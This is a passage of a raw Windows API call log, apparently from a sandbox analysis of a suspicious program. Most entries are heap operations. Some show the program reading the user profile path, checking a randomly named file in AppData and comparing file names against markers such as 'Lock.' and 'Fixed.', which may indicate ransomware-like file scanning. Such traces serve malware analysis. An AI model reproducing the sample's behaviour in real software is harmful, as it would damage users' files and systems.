RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0122.572] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/F74jGmHWDSdyxplK8Zu.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\F74jGmHWDSdyxplK8Zu.gif", lpFilePart=0x8cf650*="F74jGmHWDSdyxplK8Zu.gif") returned 0x37 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0122.573] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\F74jGmHWDSdyxplK8Zu.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f74jgmhwdsdyxplk8zu.gif")) returned 0xffffffff [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.573] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.573] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.573] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fM4.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M4.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0122.574] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0122.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0122.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fM4.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M4.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.575] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.575] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0122.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0122.576] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0122.576] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.577] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.578] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0122.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0122.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.580] PeekMessageW (in: 